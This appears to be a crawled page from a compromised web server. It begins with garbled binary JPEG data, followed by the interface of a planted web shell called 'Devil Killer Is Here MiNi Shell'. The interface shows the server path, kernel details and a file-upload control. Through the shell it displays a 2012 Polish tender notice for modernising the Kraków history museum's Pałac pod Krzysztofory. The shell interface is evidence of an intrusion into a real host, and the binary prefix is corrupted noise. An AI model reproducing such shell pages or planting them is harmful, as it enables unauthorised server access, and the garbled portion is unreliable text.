JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120723/265524-N-2012.html

<p class="kh_header"><b>Kraków: Modernizacja obiektu Pałac pod Krzysztofory - głównej siedziby Muzeum Historycznego Miasta Krakowa</b><br>
<b>Numer ogłoszenia: 265524 - 2012; data zamieszczenia: 23.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Historyczne Miasta Krakowa , Rynek Główny 35, 31-011 Kraków, woj. małopolskie, tel. 012 422 32 64, faks 012 422 32 64.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mhk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja obiektu Pałac pod Krzysztofory - głównej siedziby Muzeum Historycznego Miasta Krakowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych dla zadania pn. Modernizacja obiektu Pałac pod Krzysztofory - głównej siedziby Muzeum Historycznego Miasta Krakowa, obejmującego przebudowę skrzydła zachodniego Pałacu Pod Krzysztofory, budynek przy ul. Szczepańskiej 2 oraz przebudowę i nadbudowę budynku 
przy ul. Szczepańskiej 4 Jagiellońskiej 2 związaną z wprowadzeniem koniecznych zmian wynikających z etapowania Inwestycji pn.: Przebudowa, nadbudowa i rozbudowa na cele muzealne zespołu obiektów wraz z instalacjami i sieciami na dz. nr 313 obr. 1 Śródmieście w zakresie robót finansowanych ze środków Unii Europejskiej.
Zamówienie jest realizowane w ramach projektu Modernizacja obiektu Pałacu pod Krzysztofory  współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Rozwoju Regionalnego - Małopolskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013, Oś Priorytetowa 5.  Krakowski Obszar Metropolitalny, Działanie 5.2- Rozwój funkcji metropolitalnych Krakowskiego Obszaru Metropolitalnego. Okres realizacji projektu: do 31.12.2014 r.
W zakres przedmiotu zamówienia wchodzą prace:
1)ogólnobudowlane w tym między innymi -  na wszystkich kondygnacjach użytkowych: roboty stanu surowego i roboty wykończeniowe (fundamenty - wzmocnienia, roboty konstrukcyjne, roboty żelbetowe, roboty murowe, tynki elewacyjne i wewnętrzne, obróbki blacharskie, stolarka i ślusarka okienna i drzwiowa - wewnętrzna i zewnętrzna, podłogi, posadzki, wykończenie ścian i stropów, sufity, winda zewnętrzna);
2)konserwatorskie w tym  między innymi - konserwacja i rekonstrukcja elementów kamiennych i ceglanych oraz polichromii i elementów sztukatorskich, konserwacja elementów drewnianych;
3)instalacyjne w tym między innymi : instalacje sanitarne (wody, kanalizacji, hydrantowa, c.w.u., gazu, c.o., wentylacji mechanicznej i chłodu wraz z automatyką i sterowaniem), instalacje elektryczne (instalacja oświetlenia ogólnego i ewakuacyjnego, gniazd wtykowych, zasilania urządzeń technologicznych, połączeń wyrównawczych, ochrony od porażeń, ochrony przeciwprzepięciowej, instalacja odgromowa, instalacje niskoprądowe - system alarmu pożaru, sygnalizacji włamania z kontrolą dostępu, telewizji przemysłowej), teletechniczne i AV; przebudowa przyłącza kanalizacji sanitarnej; budowa przyłączy kanalizacji deszczowej;
4)zagospodarowanie terenu  w tym między innymi fragmenty nawierzchni dziedzińca wraz z przebudową instalacji podziemnych).
Zamówienie  obejmuje swoim zakresem modernizację i przebudowę budynków: skrzydło zachodnie (ul. Szczepańska 2) i budynek u zbiegu ulic Jagiellońskiej 2 , Szczepańskiej 4 oraz nadbudowę o jedną kondygnację parterowego budynku u zbiegu ulic Jagiellońskiej 2 , Szczepańskiej 4.
Zgodnie z założeniami realizacja zamówienia  nie obejmuje prac związanych z lokalem przeznaczonym na działalność gospodarczą. 
Parametry techniczne budynków objętych działaniami w ramach zamówienia:
-skrzydło zachodnie (ul. Szczepańska 2): powierzchnia użytkowa:  1.100 m2, powierzchnia netto: 1.548 m2;
-budynek przy ul. Jagiellońskiej 2 - Szczepańskiej 4: powierzchnia użytkowa:  687 m2, powierzchnia netto: 775 m2.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.26.90-4, 45.26.27.00-8, 45.22.32.00-8, 45.33.20.00-3, 45.31.12.00-2, 45.33.30.00-0, 71.35.19.14-3, 71.24.00.00-2, 71.51.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości:
380 000,00 złotych (słownie: trzysta osiemdziesiąt tysięcy złotych). Wadium należy wnieść przed upływem terminu składania ofert.
Wadium może być wnoszone w jednej lub w kilku następujących formach, o których mowa w art. 45 ustawy PZP tj.:
1)w pieniądzu, 
2)w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie 
   kasy jest zawsze poręczeniem pieniężnym,
3)w gwarancjach bankowych, 
4)w gwarancjach ubezpieczeniowych, 
5)w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. 
   o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy: 
Bank PEKAO S.A 
62 1240 1431 1111 0010 1944 5624 
z dopiskiem: Wadium - nr sprawy ZP -271-27/12  Roboty budowlane - Modernizacja obiektu Pałac pod Krzysztofory - głównej siedziby Muzeum Historycznego Miasta Krakowa.
W przypadku wnoszenia wadium w innej formie niż pieniądz, wymagane jest złożenie w oryginale jednego lub kilku dokumentów wskazanych w art. 45 ust. 6 pkt. 2) - 5) ustawy PZP. Oryginał dokumentu (lub oryginały dokumentów) należy załączyć do oferty w osobnej kopercie. Do każdego dokumentu wadium sporządzonego w języku innym niż język polski należy załączyć tłumaczenie na język polski.
Z dokumentu wadium wniesionego w formie wskazanej w art. 45 ust. 6 pkt. 2)-5) ustawy PZP, powinno wynikać jednoznacznie i w sposób nie budzący wątpliwości, gwarantowanie nieodwołalnie oraz bezwarunkowo wypłaty należności z tytułu wadium na pierwsze żądanie Zamawiającego w terminie nie dłuższym niż 30 dni kalendarzowych od otrzymania pierwszego żądania. 
Wadium winno obejmować cały okres związania ofertą poczynając od daty upływu terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia  wymogów w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać doświadczenie polegające na wykonaniu w okresie ostatnich 5 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: 
	
a)	co najmniej 2 zadań obejmujących wykonanie robót budowlano-konserwatorskich polegających na modernizacji, przebudowie, remoncie, nadbudowie  obiektu kubaturowego wpisanego do rejestru zabytków o wartości robót (dla każdego zadania) minimum 10 000 000 zł brutto (słownie: dziesięć  milionów zł brutto);
b)	co najmniej jedno zamówienie w obiekcie wpisanym do rejestru zabytków obejmujące: izolację fundamentów kamiennych i kamienno-ceglanych wraz z iniekcją w wykopach głębokich;
c)	co najmniej jedno zamówienie w obiekcie wpisanym do rejestru zabytków obejmujące: podbicie ścian fundamentowych z zastosowaniem mikropali lub metodą tradycyjną;
d)	co najmniej jedno zamówienie w obiekcie wpisanym do rejestru zabytków obejmujące:  prowadzenie prac pod nadzorem archeologicznym i architektonicznym;
e)	co najmniej jedno zamówienie w obiekcie wpisanym do rejestru zabytków obejmujące:
roboty konserwatorskie przy polichromiach, freskach, sztukaterii, kamieniu i sztucznym kamieniu.
Spełnianie wymogów określonych łącznie w pkt. b), c), d) i e) może polegać na posiadaniu doświadczenia polegającego na wykonaniu jednego lub większej liczby zadań np. Zamawiający uzna wymogi określone łącznie 
w pkt. b), c), d) i e) za spełnione w przypadku wykazania tylko jednego zadania, o ile zadanie to będzie odpowiadało wymaganiom postawionym w każdym z tych punktów.

W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, ich wiedza i doświadczenia będą oceniane łącznie. 
Wartości podane w dokumentach potwierdzających spełnianie wymogów w walutach innych niż PLN Wykonawca, 
a także Zamawiający przeliczy według. średniego kursu NBP (Tabela A) na dzień wszczęcia postępowania</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymogów w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować następującym potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia:  
1) kierownik budowy; Minimalne wymagania:
- wykształcenie wyższe techniczne;
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń;
- przynależność do właściwej Okręgowej Izby Inżynierów Budownictwa;
- odbycie co najmniej 2-letniej praktyki zawodowej na budowie przy zabytkach nieruchomych 
  wpisanych do rejestru zabytków; 
- 10 lat stażu pracy zawodowej w budownictwie, w tym minimum 5 lat jako kierownik budowy;
- doświadczenie w pełnieniu funkcji kierownika budowy dla co najmniej dwóch zadań obejmujących roboty budowlane na obiektach kubaturowych wpisanych do rejestru zabytków; 
2) kierownik robót konstrukcyjno - budowlanych; Minimalne wymagania:
- wykształcenie wyższe techniczne;
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-  
budowlanej bez ograniczeń;
- przynależność do właściwej Okręgowej Izby Inżynierów Budownictwa;
- odbycie co najmniej 2-letniej praktyki zawodowej na budowie przy zabytkach nieruchomych 
  wpisanych do rejestru zabytków; 
- 8 lat stażu pracy zawodowej w budownictwie, w tym minimum 4 lata jako kierownik robót 
   konstrukcyjno - budowlanych lub kierownik budowy lub inspektor nadzoru inwestorskiego 
   robót konstrukcyjno-budowlanych;
- doświadczenie w pełnieniu funkcji kierownika robót konstrukcyjno-budowlanych 
   lub kierownika  budowy lub inspektora nadzoru robót konstrukcyjno-budowlanych dla co najmniej dwóch zadań obejmujących roboty budowlane  na obiektach kubaturowych wpisanych do rejestru zabytków;  
3) kierownik robót sanitarnych; Minimalne wymagania:
-wykształcenie wyższe techniczne
-uprawnienia budowlane umożliwiające kierowanie robotami budowlanymi w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń;
- przynależność do właściwej Okręgowej Izby Inżynierów Budownictwa;
- 4 lat stażu pracy zawodowej w budownictwie, w tym minimum 2 lata jako kierownik robót 
 sanitarnych lub kierownik budowy lub inspektor nadzoru inwestorskiego robót sanitarnych;
4) kierownik robót elektrycznych; Minimalne wymagania:
-wykształcenie wyższe techniczne
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń;
- przynależność do właściwej Okręgowej Izby Inżynierów Budownictwa;
- 4 lat stażu pracy zawodowej w budownictwie, w tym minimum 2 lata jako kierownik robót elektrycznych lub kierownik budowy lub inspektor nadzoru inwestorskiego robót elektrycznych;
5) Osoba prowadząca badania i pełniąca nadzór archeologiczny z tytułem magistra uzyskanym na studiach wyższych na kierunku archeologia. Osoba ta winna posiadać co najmniej 5 lat doświadczenia w prowadzeniu badań archeologicznych, z doświadczeniem w prowadzeniu badań na stanowiskach wczesnośredniowiecznych, średniowiecznych i nowożytnych zgodnie z Rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków, badań oraz badań archeologicznych poszukiwań ukrytych i porzuconych zabytków ruchomych (Dz. U. 2011 roku, nr 165, poz. 987).
6) Badacz architektury z tytułem magistra inżyniera architekta winien posiadać co najmniej 5 lat doświadczenia w zakresie badań architektury, zgodnie z Rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków, badań oraz badań archeologicznych poszukiwań ukrytych i porzuconych zabytków ruchomych (Dz. U. 2011 roku, nr 165, poz. 987).
7) Kierownik prac konserwatorskich z tytułem magistra lub uprawnieniami w zakresie renowacji i restauracji malarstwa i rzeźby winien posiadać co najmniej 5 lat doświadczenia w pracach w zakresie renowacji i restauracji malarstwa i rzeźby zgodnie z Rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków, badań oraz badań archeologicznych poszukiwań ukrytych i porzuconych zabytków ruchomych (Dz. U. 2011 roku, nr 165, poz. 987).
Osoba instalująca  zabezpieczenia elektroniczne powinna posiadać zaświadczenie o ukończeniu specjalistycznych kursów z zakresu zabezpieczenia obiektów  muzealnych, organizowanych przez Ośrodek Ochrony Zbiorów Publicznych, zgodnie z § 12 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 1 grudnia 2008 roku, w sprawie zabezpieczania zbiorów w muzeach przed pożarem, kradzieżą i innym niebezpieczeństwem grożącym zniszczeniem lub utratą zbiorów oraz sposobów przygotowania zbiorów do ewakuacji w razie powstania zagrożenia (Dz. U. z 2008 r., Nr 229, poz. 1528). 
W każdym przypadku, gdy wymagane jest posiadanie określonych uprawnień budowlanych przez osobę wskazywaną do pełnienia jakiejkolwiek funkcji wymienionej w pkt. od  1) do 5), Zamawiający dopuszcza posiadanie przez wskazane osoby:
 - uprawnień równoważnych względem wymaganych, które zostały wydane na podstawie wcześniej obowiązujących 
    przepisów
    lub: 
 -  uprawnień równoważnych względem wymaganych, uznanych przez właściwy organ zgodnie z ustawą z dnia 
   18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii 
   Europejskiej (tj. Dz. U. z 2008 r. Nr 63, poz. 394) 
    lub:
 - kwalifikacji zawodowych równoważnych względem wymaganych, ważnych w innym niż Polska państwie 
    członkowskim Unii Europejskiej, Konferederacji Szwajcarskiej lub państwie członkowskim Europejskiego 
    Porozumienia o Wolnym Handlu (EFTA) - stronie umowy o Europejskim Obszarze Gospodarczym 
    wraz z tymczasowym wpisem na listę właściwej izby samorządu zawodowego umożliwiającym świadczenie usług 
    transgranicznych w rozumieniu art. 20a ust. 1 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych 
   architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5 poz. 42 z późn. zm.). 
Zamawiający nie dopuszcza wskazywania tej samej osoby na więcej niż jedno stanowisko. 
W przypadku Wykonawców występujących wspólnie spełnianie wymogu w zakresie osób zdolnych do wykonania zamówienia będzie oceniane łącznie.

Wykonawca może polegać na zasobach innych podmiotów w zakresie: wiedzy i doświadczenia, potencjału technicznego oraz osób zdolnych do wykonania zamówienia.
Jeżeli Wykonawca polega na zasobach innych podmiotów w zakresie wiedzy i doświadczenia, potencjału technicznego, osób zdolnych do wykonania zamówienia, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. W przypadku polegania na zasobach podmiotu trzeciego w zakresie wiedzy i doświadczenia, konieczny jest udział tego podmiotu w realizacji przedmiotu zamówienia. Udział ów nie musi polegać na pełnieniu roli podwykonawcy. Pisemne zobowiązanie do oddania do dyspozycji zasobów w postaci wiedzy i doświadczenia winno zatem obejmować także udział w realizacji zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi spełniać następujące warunki dotyczące sytuacji ekonomicznej i  finansowej:
a)	
posiadanie środków finansowych lub zdolności kredytowej w wysokości 5 000 000 zł (słownie: pięć milionów złotych);
b)	
posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
z przedmiotem zamówienia w wysokości minimum 15 000 000 zł (słownie: piętnaście milionów złotych). 
W przypadku Wykonawców występujących wspólnie będzie oceniany ich łączny potencjał ekonomiczny i finansowy. 
Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru  prawnego łączących go z nimi stosunków. Jeżeli wykonawca polega na zdolności finansowej innych podmiotów, zobowiązany jest udowodnić Zamawiającemu, że w zakresie zdolności finansowej, będzie dysponował zasobami innych podmiotów przedstawiając w tym celu w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Wartości podane w dokumentach potwierdzających spełnianie wymogów w walutach innych niż PLN Wykonawca,
przeliczy według średniego kursu NBP (Tabela A) na dzień wszczęcia niniejszego ogłoszenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

